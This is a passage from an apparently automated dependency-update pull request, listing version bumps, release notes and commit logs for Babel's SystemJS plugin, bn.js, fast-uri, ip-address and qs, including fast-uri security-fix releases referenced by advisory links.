href=\"https://github.com/JLHwung\"\u003e\u003ccode\u003e@​JLHwung\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003ebabel-register\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/babel/babel/pull/17915\"\u003e#17915\u003c/a\u003e Fix thread synchronization issues in \u003ccode\u003e@babel/register\u003c/code\u003e (\u003ca href=\"https://github.com/liuxingbaoyu\"\u003e\u003ccode\u003e@​liuxingbaoyu\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003ebabel-compat-data\u003c/code\u003e, \u003ccode\u003ebabel-plugin-bugfix-safari-rest-destructuring-rhs-array\u003c/code\u003e, \u003ccode\u003ebabel-preset-env\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/babel/babel/pull/17788\"\u003e#17788\u003c/a\u003e Add bugfix plugin for Safari array rest destructuring bug (\u003ca href=\"https://github.com/JLHwung\"\u003e\u003ccode\u003e@​JLHwung\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch4\u003e:nail_care: Polish\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003ebabel-parser\u003c/code\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/babel/babel/commit/4fba7541180bf5f58256d8e358b544e3831ad090\"\u003e\u003ccode\u003e4fba754\u003c/code\u003e\u003c/a\u003e v7.29.7\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/babel/babel/commit/a458f66074b97d54773db8159af673d23b26079b\"\u003e\u003ccode\u003ea458f66\u003c/code\u003e\u003c/a\u003e v7.29.4\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/babel/babel/commit/32ebd5aaf2526ddd176fd6a3d1e3dc594abdc8d9\"\u003e\u003ccode\u003e32ebd5a\u003c/code\u003e\u003c/a\u003e [7.x backport]fix(systemjs): improve module string name support (\u003ca href=\"https://github.com/babel/babel/tree/HEAD/packages/babel-plugin-transform-modules-systemjs/issues/17974\"\u003e#17974\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/babel/babel/commit/aa8394e454337d118ac3d40bfa3ee1a3cb3f3ed2\"\u003e\u003ccode\u003eaa8394e\u003c/code\u003e\u003c/a\u003e v7.29.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/babel/babel/commit/0053db620c05acf0036f593b5aaf4e372daa79d0\"\u003e\u003ccode\u003e0053db6\u003c/code\u003e\u003c/a\u003e Update polyfill packages (\u003ca href=\"https://github.com/babel/babel/tree/HEAD/packages/babel-plugin-transform-modules-systemjs/issues/17727\"\u003e#17727\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/babel/babel/commit/61647ae2397c82c3c71f077b5ab109106a5cac0f\"\u003e\u003ccode\u003e61647ae\u003c/code\u003e\u003c/a\u003e v7.28.5\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/babel/babel/commit/a177d551adba99773f4ff00ea9bf46550def6132\"\u003e\u003ccode\u003ea177d55\u003c/code\u003e\u003c/a\u003e [Babel 8] Use \u003ccode\u003et.traverseFast\u003c/code\u003e to replace some \u003ccode\u003epath.traverse\u003c/code\u003e (\u003ca href=\"https://github.com/babel/babel/tree/HEAD/packages/babel-plugin-transform-modules-systemjs/issues/17518\"\u003e#17518\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/babel/babel/commit/eebd3a06021c13d335b5b0bd79734df3abbea678\"\u003e\u003ccode\u003eeebd3a0\u003c/code\u003e\u003c/a\u003e v7.27.1\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/babel/babel/commit/317e332e650bc04907bc787ab79f930288a3e71e\"\u003e\u003ccode\u003e317e332\u003c/code\u003e\u003c/a\u003e Enforce node protocol import (\u003ca href=\"https://github.com/babel/babel/tree/HEAD/packages/babel-plugin-transform-modules-systemjs/issues/17207\"\u003e#17207\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/babel/babel/commit/fdc0fb59e119ee0b38bced63867a344a5b4bc2f3\"\u003e\u003ccode\u003efdc0fb5\u003c/code\u003e\u003c/a\u003e [Babel 8] Bump nodejs requirements to \u003ccode\u003e^20.19.0 || \u0026gt;= 22.12.0\u003c/code\u003e (\u003ca href=\"https://github.com/babel/babel/tree/HEAD/packages/babel-plugin-transform-modules-systemjs/issues/17204\"\u003e#17204\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/babel/babel/commits/v7.29.7/packages/babel-plugin-transform-modules-systemjs\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eMaintainer changes\u003c/summary\u003e\n\u003cp\u003eThis version was pushed to npm by \u003ca href=\"https://www.npmjs.com/~GitHub%20Actions\"\u003eGitHub Actions\u003c/a\u003e, a new releaser for \u003ccode\u003e@​babel/plugin-transform-modules-systemjs\u003c/code\u003e since your current version.\u003c/p\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `bn.js` from 4.12.0 to 4.12.3\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/indutny/bn.js/commit/39fe4389c773327ed15f29f77f8b7dbbff4beb4c\"\u003e\u003ccode\u003e39fe438\u003c/code\u003e\u003c/a\u003e 4.12.3\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/indutny/bn.js/commit/67ecb35dabaf252001b649c12d69c4b57deac6f6\"\u003e\u003ccode\u003e67ecb35\u003c/code\u003e\u003c/a\u003e backport(4.x): fix imaskn state (\u003ca href=\"https://redirect.github.com/indutny/bn.js/issues/317\"\u003e#317\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/indutny/bn.js/commit/c4098bac2470418f8e0f6bf11fe0cb676a2b9047\"\u003e\u003ccode\u003ec4098ba\u003c/code\u003e\u003c/a\u003e 4.12.2\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/indutny/bn.js/commit/6277fd705e51edae1c404c65f03ba2e512706945\"\u003e\u003ccode\u003e6277fd7\u003c/code\u003e\u003c/a\u003e backport(4.x): Fix imuln/muln with zero (backport of \u003ca href=\"https://redirect.github.com/indutny/bn.js/issues/313\"\u003e#313\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/indutny/bn.js/issues/314\"\u003e#314\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/indutny/bn.js/commit/ac0d4afaae91701815b9edc19789e44e7690d688\"\u003e\u003ccode\u003eac0d4af\u003c/code\u003e\u003c/a\u003e 4.12.1\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/indutny/bn.js/commit/a5f14b43ec61bc7cafc6de2e7444913b9f581b00\"\u003e\u003ccode\u003ea5f14b4\u003c/code\u003e\u003c/a\u003e Fix serious issue in \u003ccode\u003e.toString(16)\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/indutny/bn.js/issues/309\"\u003e#309\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/indutny/bn.js/commit/0cd2661b9d08512263c940662586042ef8aaccc6\"\u003e\u003ccode\u003e0cd2661\u003c/code\u003e\u003c/a\u003e Remove package-lock.json added by npm\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/indutny/bn.js/compare/v4.12.0...v4.12.3\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `fast-uri` from 3.0.6 to 3.1.2\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/fastify/fast-uri/releases\"\u003efast-uri's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev3.1.2\u003c/h2\u003e\n\u003ch2\u003e⚠️ Security Release\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFix for \u003ca href=\"https://github.com/fastify/fast-uri/security/advisories/GHSA-v39h-62p7-jpjc\"\u003ehttps://github.com/fastify/fast-uri/security/advisories/GHSA-v39h-62p7-jpjc\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eHandle malformed fragment decoding as a parse error by \u003ca href=\"https://github.com/mcollina\"\u003e\u003ccode\u003e@​mcollina\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/fastify/fast-uri/pull/171\"\u003efastify/fast-uri#171\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/fastify/fast-uri/compare/v3.1.1...v3.1.2\"\u003ehttps://github.com/fastify/fast-uri/compare/v3.1.1...v3.1.2\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev3.1.1\u003c/h2\u003e\n\u003ch2\u003e⚠️ Security Release\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFix for \u003ca href=\"https://github.com/fastify/fast-uri/security/advisories/GHSA-q3j6-qgpj-74h6\"\u003ehttps://github.com/fastify/fast-uri/security/advisories/GHSA-q3j6-qgpj-74h6\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003ebuild(deps-dev): bump tsd from 0.32.0 to 0.33.0 by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/fastify/fast-uri/pull/148\"\u003efastify/fast-uri#148\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003ebuild(deps): bump actions/checkout from 4 to 5 by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/fastify/fast-uri/pull/149\"\u003efastify/fast-uri#149\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003echore(.npmrc): ignore scripts by \u003ca href=\"https://github.com/Fdawgs\"\u003e\u003ccode\u003e@​Fdawgs\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/fastify/fast-uri/pull/150\"\u003efastify/fast-uri#150\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003ebuild(deps-dev): remove \u003ccode\u003e@​fastify/pre-commit\u003c/code\u003e by \u003ca href=\"https://github.com/Fdawgs\"\u003e\u003ccode\u003e@​Fdawgs\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/fastify/fast-uri/pull/151\"\u003efastify/fast-uri#151\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003ebuild(deps): bump actions/setup-node from 4 to 5 by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/fastify/fast-uri/pull/152\"\u003efastify/fast-uri#152\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eci(ci): add concurrency config by \u003ca href=\"https://github.com/Fdawgs\"\u003e\u003ccode\u003e@​Fdawgs\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/fastify/fast-uri/pull/153\"\u003efastify/fast-uri#153\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003ebuild(deps): bump actions/setup-node from 5 to 6 by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/fastify/fast-uri/pull/154\"\u003efastify/fast-uri#154\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003ebuild(deps): bump actions/checkout from 5 to 6 by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/fastify/fast-uri/pull/156\"\u003efastify/fast-uri#156\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003echore(license): standardise license notice by \u003ca href=\"https://github.com/Fdawgs\"\u003e\u003ccode\u003e@​Fdawgs\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/fastify/fast-uri/pull/159\"\u003efastify/fast-uri#159\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003estyle: remove trailing whitespace by \u003ca href=\"https://github.com/Fdawgs\"\u003e\u003ccode\u003e@​Fdawgs\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/fastify/fast-uri/pull/161\"\u003efastify/fast-uri#161\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eci: remove unused github files by \u003ca href=\"https://github.com/Tony133\"\u003e\u003ccode\u003e@​Tony133\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/fastify/fast-uri/pull/162\"\u003efastify/fast-uri#162\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003echore: update readme by \u003ca href=\"https://github.com/Tony133\"\u003e\u003ccode\u003e@​Tony133\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/fastify/fast-uri/pull/164\"\u003efastify/fast-uri#164\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003ebuild(deps): bump fastify/workflows/.github/workflows/plugins-ci-package-manager.yml from 5 to 6 by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/fastify/fast-uri/pull/165\"\u003efastify/fast-uri#165\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003ebuild(deps): bump fastify/workflows/.github/workflows/plugins-ci.yml from 5 to 6 by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/fastify/fast-uri/pull/166\"\u003efastify/fast-uri#166\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003ebuild(deps-dev): bump neostandard from 0.12.2 to 0.13.0 by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/fastify/fast-uri/pull/167\"\u003efastify/fast-uri#167\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eci: add lock-threads workflow by \u003ca href=\"https://github.com/Fdawgs\"\u003e\u003ccode\u003e@​Fdawgs\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/fastify/fast-uri/pull/169\"\u003efastify/fast-uri#169\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eNew Contributors\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/Tony133\"\u003e\u003ccode\u003e@​Tony133\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/fastify/fast-uri/pull/162\"\u003efastify/fast-uri#162\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/fastify/fast-uri/compare/v3.1.0...v3.1.1\"\u003ehttps://github.com/fastify/fast-uri/compare/v3.1.0...v3.1.1\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev3.1.0\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eci: remove master branch support by \u003ca href=\"https://github.com/Fdawgs\"\u003e\u003ccode\u003e@​Fdawgs\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/fastify/fast-uri/pull/126\"\u003efastify/fast-uri#126\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003echore(test) remove .gitkeep by \u003ca href=\"https://github.com/Fdawgs\"\u003e\u003ccode\u003e@​Fdawgs\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/fastify/fast-uri/pull/128\"\u003efastify/fast-uri#128\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eci(ci): set job permissions by \u003ca href=\"https://github.com/Fdawgs\"\u003e\u003ccode\u003e@​Fdawgs\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/fastify/fast-uri/pull/129\"\u003efastify/fast-uri#129\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eci: set permissions at workflow level by \u003ca href=\"https://github.com/Fdawgs\"\u003e\u003ccode\u003e@​Fdawgs\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/fastify/fast-uri/pull/131\"\u003efastify/fast-uri#131\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eci: set workflow permissions to read-only by default by \u003ca href=\"https://github.com/Fdawgs\"\u003e\u003ccode\u003e@​Fdawgs\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/fastify/fast-uri/pull/132\"\u003efastify/fast-uri#132\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eci(ci): restore job level permissions by \u003ca href=\"https://github.com/Fdawgs\"\u003e\u003ccode\u003e@​Fdawgs\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/fastify/fast-uri/pull/133\"\u003efastify/fast-uri#133\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003ebuild(deps-dev): bump tsd from 0.31.2 to 0.32.0 by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/fastify/fast-uri/pull/134\"\u003efastify/fast-uri#134\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eci(ci): pin actions to commit-hash by \u003ca href=\"https://github.com/Fdawgs\"\u003e\u003ccode\u003e@​Fdawgs\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/fastify/fast-uri/pull/135\"\u003efastify/fast-uri#135\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eci: add node 24 to test matrix by \u003ca href=\"https://github.com/Fdawgs\"\u003e\u003ccode\u003e@​Fdawgs\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/fastify/fast-uri/pull/136\"\u003efastify/fast-uri#136\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/fastify/fast-uri/commit/919dd8ea7689fcc220d0d9b71307f5095e723ef9\"\u003e\u003ccode\u003e919dd8e\u003c/code\u003e\u003c/a\u003e Bumped v3.1.2\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/fastify/fast-uri/commit/c65ba573714af6b8e19e481d9444c27bc4355d07\"\u003e\u003ccode\u003ec65ba57\u003c/code\u003e\u003c/a\u003e fixup: linting\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/fastify/fast-uri/commit/6c86c17c3d76fb93aa3700ec6c0fa00faeb97293\"\u003e\u003ccode\u003e6c86c17\u003c/code\u003e\u003c/a\u003e Merge commit from fork\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/fastify/fast-uri/commit/a95158ad308df4d92bbde4eba699ce5165e9f796\"\u003e\u003ccode\u003ea95158a\u003c/code\u003e\u003c/a\u003e Handle malformed fragment decoding without throwing (\u003ca href=\"https://redirect.github.com/fastify/fast-uri/issues/171\"\u003e#171\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/fastify/fast-uri/commit/cea547c91c6aae610041b17b75792ca4aa035a6d\"\u003e\u003ccode\u003ecea547c\u003c/code\u003e\u003c/a\u003e Bumped v3.1.1\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/fastify/fast-uri/commit/876ce79b662c3e5015e4e7dffe6f37752ad34f35\"\u003e\u003ccode\u003e876ce79\u003c/code\u003e\u003c/a\u003e Merge commit from fork\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/fastify/fast-uri/commit/dcdf690b71a7bb3a19887ada65a9ab160d83bcc0\"\u003e\u003ccode\u003edcdf690\u003c/code\u003e\u003c/a\u003e ci: add lock-threads workflow (\u003ca href=\"https://redirect.github.com/fastify/fast-uri/issues/169\"\u003e#169\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/fastify/fast-uri/commit/c860e6589b1ac346f66e114b4eadb9613768108c\"\u003e\u003ccode\u003ec860e65\u003c/code\u003e\u003c/a\u003e build(deps-dev): bump neostandard from 0.12.2 to 0.13.0 (\u003ca href=\"https://redirect.github.com/fastify/fast-uri/issues/167\"\u003e#167\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/fastify/fast-uri/commit/9b4c6dc82fde0ca44e674403ece9185d85bb6d5f\"\u003e\u003ccode\u003e9b4c6dc\u003c/code\u003e\u003c/a\u003e build(deps): bump fastify/workflows/.github/workflows/plugins-ci.yml (\u003ca href=\"https://redirect.github.com/fastify/fast-uri/issues/166\"\u003e#166\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/fastify/fast-uri/commit/85d09a9f7aa76b32c2bb005a90a71e144c361d24\"\u003e\u003ccode\u003e85d09a9\u003c/code\u003e\u003c/a\u003e build(deps): bump fastify/workflows/.github/workflows/plugins-ci-package-mana...\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/fastify/fast-uri/compare/v3.0.6...v3.1.2\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `ip-address` from 10.0.1 to 10.2.0\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/beaugunderson/ip-address/commit/80fccaae984618f35dc941efab55cf2440ab37e8\"\u003e\u003ccode\u003e80fccaa\u003c/code\u003e\u003c/a\u003e 10.2.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/beaugunderson/ip-address/commit/abaeb4d817cab16d3a1a78abd249d1f116bd302e\"\u003e\u003ccode\u003eabaeb4d\u003c/code\u003e\u003c/a\u003e Type Address4.addressMinusSuffix as non-nilable (closes \u003ca href=\"https://redirect.github.com/beaugunderson/ip-address/issues/143\"\u003e#143\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/beaugunderson/ip-address/commit/2878c294e1216f9a0b69ad1d3c57a3790a7d5e8e\"\u003e\u003ccode\u003e2878c29\u003c/code\u003e\u003c/a\u003e Preserve subnet prefix through Address6.to4() (closes \u003ca href=\"https://redirect.github.com/beaugunderson/ip-address/issues/123\"\u003e#123\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/beaugunderson/ip-address/issues/203\"\u003e#203\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/beaugunderson/ip-address/commit/586666ee9e666464071761d7a453715f98b6caee\"\u003e\u003ccode\u003e586666e\u003c/code\u003e\u003c/a\u003e Reject trailing junk in Address6.fromURL (closes \u003ca href=\"https://redirect.github.com/beaugunderson/ip-address/issues/158\"\u003e#158\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/beaugunderson/ip-address/issues/202\"\u003e#202\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/beaugunderson/ip-address/commit/80bc76eddf63df38db60defd5004bea919adf7ac\"\u003e\u003ccode\u003e80bc76e\u003c/code\u003e\u003c/a\u003e Validate static factories instead of silently overflowing (\u003ca href=\"https://redirect.github.com/beaugunderson/ip-address/issues/201\"\u003e#201\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/beaugunderson/ip-address/commit/98927be9ef0c09f8ffcaf30b297405c9eff0a520\"\u003e\u003ccode\u003e98927be\u003c/code\u003e\u003c/a\u003e Clarify isValid() accepts CIDRs with host bits set (\u003ca href=\"https://redirect.github.com/beaugunderson/ip-address/issues/81\"\u003e#81\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/beaugunderson/ip-address/commit/a0eb0732d6ac3088daa1106f4933eade41fd364a\"\u003e\u003ccode\u003ea0eb073\u003c/code\u003e\u003c/a\u003e Fix getScope() and broaden getType() classification (closes \u003ca href=\"https://redirect.github.com/beaugunderson/ip-address/issues/122\"\u003e#122\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/beaugunderson/ip-address/issues/200\"\u003e#200\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/beaugunderson/ip-address/commit/ec52105c87179129b9f091e97581e87b007824c7\"\u003e\u003ccode\u003eec52105\u003c/code\u003e\u003c/a\u003e Add networkForm() for CIDR network-address strings (\u003ca href=\"https://redirect.github.com/beaugunderson/ip-address/issues/199\"\u003e#199\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/beaugunderson/ip-address/commit/a9443a72215b21a1e692be75cd3e18e8aa2262cb\"\u003e\u003ccode\u003ea9443a7\u003c/code\u003e\u003c/a\u003e Add isMapped4() predicate for IPv4-mapped IPv6 addresses (closes \u003ca href=\"https://redirect.github.com/beaugunderson/ip-address/issues/62\"\u003e#62\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/beaugunderson/ip-address/issues/198\"\u003e#198\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/beaugunderson/ip-address/commit/f01d74267ed39f84521157e5f199edade9809f1e\"\u003e\u003ccode\u003ef01d742\u003c/code\u003e\u003c/a\u003e Add address-property predicates (private, ULA, loopback, link-local, etc.) (#...\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/beaugunderson/ip-address/compare/v10.0.1...v10.2.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `qs` from 6.11.2 to 6.13.0\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/ljharb/qs/blob/main/CHANGELOG.md\"\u003eqs's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e\u003cstrong\u003e6.13.0\u003c/strong\u003e\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e[New] \u003ccode\u003eparse\u003c/code\u003e: add \u003ccode\u003estrictDepth\u003c/code\u003e option (\u003ca href=\"https://redirect.github.com/ljharb/qs/issues/511\"\u003e#511\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e[Tests] use \u003ccode\u003enpm audit\u003c/code\u003e instead of \u003ccode\u003eaud\u003c/code\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e\u003cstrong\u003e6.12.5\u003c/strong\u003e\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e[Fix] fix regressions from robustness refactor\u003c/li\u003e\n\u003cli\u003e[actions] update reusable workflows\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e\u003cstrong\u003e6.12.4\u003c/strong\u003e\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e[Robustness] avoid \u003ccode\u003e.push\u003c/code\u003e, use \u003ccode\u003evoid\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e[readme] clarify \u003ccode\u003eparseArrays\u003c/code\u003e and \u003ccode\u003earrayLimit\u003c/code\u003e documentation (\u003ca href=\"https://redirect.github.com/ljharb/qs/issues/543\"\u003e#543\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e[readme] document that \u003ccode\u003eaddQueryPrefix\u003c/code\u003e does not add \u003ccode\u003e?\u003c/code\u003e to empty output (\u003ca href=\"https://redirect.github.com/ljharb/qs/issues/418\"\u003e#418\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e[readme] replace runkit CI badge with shields.io check-runs badge\u003c/li\u003e\n\u003cli\u003e[actions] fix rebase workflow 